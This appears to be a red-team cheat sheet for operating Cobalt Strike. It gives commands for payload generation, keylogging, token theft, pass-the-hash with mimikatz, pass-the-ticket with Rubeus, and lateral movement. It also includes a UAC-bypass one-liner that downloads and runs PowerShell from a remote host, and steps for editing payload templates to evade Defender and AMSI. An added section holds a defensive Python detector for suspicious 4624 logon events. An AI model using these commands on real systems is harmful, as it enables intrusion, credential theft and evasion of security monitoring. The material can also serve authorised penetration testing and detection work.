Cobalt Strike -> Listeners -> Add/Edit, then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
Peer2Peer Listeners
The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
Cobalt Strike -> Listeners -> Add/Edit, then you need to select the TCP or SMB beacon.
The TCP beacon will start a listener on the selected port. To connect to a TCP beacon, use the command connect <ip> <port> from another beacon.
The SMB beacon will listen on a named pipe with the selected name. To connect to an SMB beacon, use the command link [target] [pipe].
Generate & Host payloads
Generate payloads in files
Attacks -> Packages ->
HTMLApplication for HTA files
MS Office Macro for an office document with a macro
Windows Executable for a .exe, .dll or service .exe
Windows Executable (S) for a stageless .exe, .dll or service .exe (stageless is preferable to staged: fewer IoCs)
Generate & Host payloads
Attacks -> Web Drive-by -> Scripted Web Delivery (S). This will generate a script/executable that downloads the beacon from Cobalt Strike, in formats such as bitsadmin, exe, powershell and python.
Host Payloads
If you already have the file you want to host on a web server, just go to Attacks -> Web Drive-by -> Host File, then select the file to host and the web server config.
Beacon Options
```bash
# Execute local .NET binary
execute-assembly </path/to/executable.exe>

# Screenshots
printscreen    # Take a single screenshot via PrintScr method
screenshot     # Take a single screenshot
screenwatch    # Take periodic screenshots of desktop
## Go to View -> Screenshots to see them

# keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed

# portscan
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
portscan [targets] [ports] [arp|icmp|none] [max connections]

# Powershell
# Import Powershell module
powershell-import C:\path\to\PowerView.ps1
powershell <just write powershell cmd here>

# User impersonation
## Token generation with creds
make_token [DOMAIN\user] [password] # Create token to impersonate a user in the network
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token generated with make_token
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.

# UAC Bypass
elevate svc-exe <listener>
elevate uac-token-duplication <listener>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

## Steal token from pid
## Like make_token but stealing the token from a process
steal_token [pid] # Also, this is useful for network actions, not local actions
## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token from steal_token

## Launch process with new credentials
spawnas [domain\username] [password] [listener] # Do it from a directory with read access like: cd C:\
## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).

## Inject into process
inject [pid] [x64|x86] [listener]
## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).

## Pass the hash
## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and is not all that viable if Protected Process Light (PPL) is enabled.
pth [pid] [arch] [DOMAIN\user] [NTLM hash]
pth [DOMAIN\user] [NTLM hash]

## Pass the hash through mimikatz
mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLMHASH> /run:"powershell -w hidden"
## Without /run, mimikatz spawns a cmd.exe; if you are running as a user with a Desktop, they will see the shell (if you are running as SYSTEM you are good to go)
steal_token <pid> # Steal token from process created by mimikatz

## Pass the ticket
## Request a ticket
execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
make_token <domain>\<username> DummyPass
## Write the ticket on the attacker machine from a powershell session & load it
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi

## Pass the ticket from SYSTEM
## Generate a new process with the ticket
execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## Steal the token from that process
steal_token <pid>

## Extract ticket + Pass the ticket
### List tickets
execute-assembly C:\path\Rubeus.exe triage
### Dump interesting ticket by luid
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
### Create new logon session, note luid and processid
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### Insert ticket in the generated logon session
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
### Finally, steal the token from that new process
steal_token <pid>

# Lateral Movement
## If a token was created it will be used
jump [method] [target] [listener]
## Methods:
## psexec      x86  Use a service to run a Service EXE artifact
## psexec64    x64  Use a service to run a Service EXE artifact
## psexec_psh  x86  Use a service to run a PowerShell one-liner
## winrm       x86  Run a PowerShell script via WinRM
## winrm64     x64  Run a PowerShell script via WinRM

remote-exec [method] [target] [command]
## Methods:
## psexec  Remote execute via Service Control Manager
## winrm   Remote execute via WinRM (PowerShell)
## wmi     Remote execute via WMI

## To execute a beacon with wmi (it isn't in the jump command) just upload the beacon and execute it
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe

# Pass session to Metasploit - Through listener
## On metasploit host
msf6> use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j

## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
beacon> spawn metasploit
## You can only spawn x86 Meterpreter sessions with the foreign listener.

# Pass session to Metasploit - Through shellcode injection
## On metasploit host
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
## Run msfvenom and prepare the multi/handler listener

## Copy bin file to cobalt strike host
ps
shinject <pid> x64 C:\Payloads\msf.bin # Inject metasploit shellcode in a x64 process

# Pass metasploit session to cobalt strike
## Generate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated Cobalt Strike shellcode

# Pivoting
## Open a socks proxy in the teamserver
beacon> socks 1080

# SSH connection
beacon> ssh 10.10.17.12:22 username password
```
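The notes above point out that make_token produces a 4624 event with Logon Type 9 (LOGON32_LOGON_NEW_CREDENTIALS) and spawnas a 4624 with Logon Type 2 carrying the impersonated user in TargetOutboundUserName. The following is an added defender-side example, not part of the original page or of Cobalt Strike, that applies exactly that filtering to 4624 records. The "Key=Value;..." record format, the sample events and the allow-list of processes expected to raise type-9 logons (runas /netonly) are all constructed for the example.

```python
"""Added example (not from the original notes): flag Security event 4624 records
matching the two patterns described above, Logon Type 9 (what make_token produces)
and Logon Type 2 with an impersonated user in TargetOutboundUserName (what spawnas
produces). Record format, sample data and the allow-list are constructed."""
from typing import Iterable, List, Optional

NEW_CREDENTIALS = "9"   # LOGON32_LOGON_NEW_CREDENTIALS, e.g. make_token or runas /netonly
INTERACTIVE = "2"       # LOGON32_LOGON_INTERACTIVE, e.g. spawnas

# Assumed allow-list: processes that legitimately raise type-9 logons in this environment.
EXPECTED_TYPE9_PROCESSES = {r"c:\windows\system32\runas.exe"}


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value;Key=Value' record (constructed format) into a dict."""
    fields = {}
    for part in line.strip().split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def classify(event: dict) -> Optional[str]:
    """Return a rule name when a 4624 record matches one of the two patterns, else None."""
    if event.get("EventID") != "4624":
        return None
    logon_type = event.get("LogonType")
    caller = event.get("TargetUserName", "-")
    outbound = event.get("TargetOutboundUserName", "-")
    process = event.get("ProcessName", "-").lower()
    # Type 9 is rare enough that anything outside the allow-list deserves a look.
    if logon_type == NEW_CREDENTIALS and process not in EXPECTED_TYPE9_PROCESSES:
        return "new_credentials_logon"
    # Ordinary console logons carry '-' as the outbound user; a distinct
    # outbound user on a type-2 logon matches the spawnas pattern above.
    if logon_type == INTERACTIVE and outbound not in ("-", "") and outbound != caller:
        return "interactive_logon_with_outbound_user"
    return None


def find_suspicious(lines: Iterable[str]) -> List[dict]:
    """Run classify() over raw records and return the matches with context fields."""
    findings = []
    for line in lines:
        event = parse_event(line)
        rule = classify(event)
        if rule:
            findings.append({
                "rule": rule,
                "host": event.get("Computer"),
                "caller": event.get("TargetUserName"),
                "impersonated": event.get("TargetOutboundUserName"),
                "process": event.get("ProcessName"),
            })
    return findings


# Constructed sample records; field names follow the Security log's EventData.
SAMPLE_LOG = [
    "EventID=4624;Computer=WS01;LogonType=3;TargetUserName=alice;TargetOutboundUserName=-;ProcessName=-",
    "EventID=4624;Computer=WS01;LogonType=9;TargetUserName=alice;TargetOutboundUserName=svc_backup;ProcessName=C:\\Windows\\System32\\svchost.exe",
    "EventID=4624;Computer=WS02;LogonType=9;TargetUserName=bob;TargetOutboundUserName=bob;ProcessName=C:\\Windows\\System32\\runas.exe",
    "EventID=4624;Computer=WS01;LogonType=2;TargetUserName=alice;TargetOutboundUserName=svc_backup;ProcessName=C:\\Windows\\System32\\svchost.exe",
    "EventID=4624;Computer=WS03;LogonType=2;TargetUserName=carol;TargetOutboundUserName=-;ProcessName=C:\\Windows\\System32\\winlogon.exe",
    "EventID=4625;Computer=WS01;LogonType=9;TargetUserName=mallory;TargetOutboundUserName=admin;ProcessName=C:\\Windows\\System32\\svchost.exe",
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

Only the second and fourth sample records are reported: the runas.exe type-9 logon is on the allow-list, the winlogon.exe console logon has no outbound user, and the 4625 failure is not a 4624 at all. In a real deployment the allow-list is the part to tune, since type-9 logons do occur legitimately wherever runas /netonly or similar tooling is in routine use.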
Avoiding AVs
Artifact Kit
Usually in /opt/cobaltstrike/artifact-kit you can find the code and pre-compiled templates (in /src-common) of the payloads that Cobalt Strike is going to use to generate the binary beacons.
Using ThreatCheck with the generated backdoor (or just with the compiled template) you can find what is making Defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
After modifying the code, just run ./build.sh from the same directory and copy the dist-pipe/ folder onto the Windows client in C:\Tools\cobaltstrike\ArtifactKit.
Don't forget to load the Aggressor script dist-pipe\artifact.cna to tell Cobalt Strike to use the resources from disk that we want rather than the built-in ones.
Resource Kit
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
Using ThreatCheck with the templates you can find what Defender (AMSI in this case) does not like and modify it:
Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the Aggressor script ResourceKit\resources.cna to tell Cobalt Strike to use the resources from disk that we want rather than the built-in ones.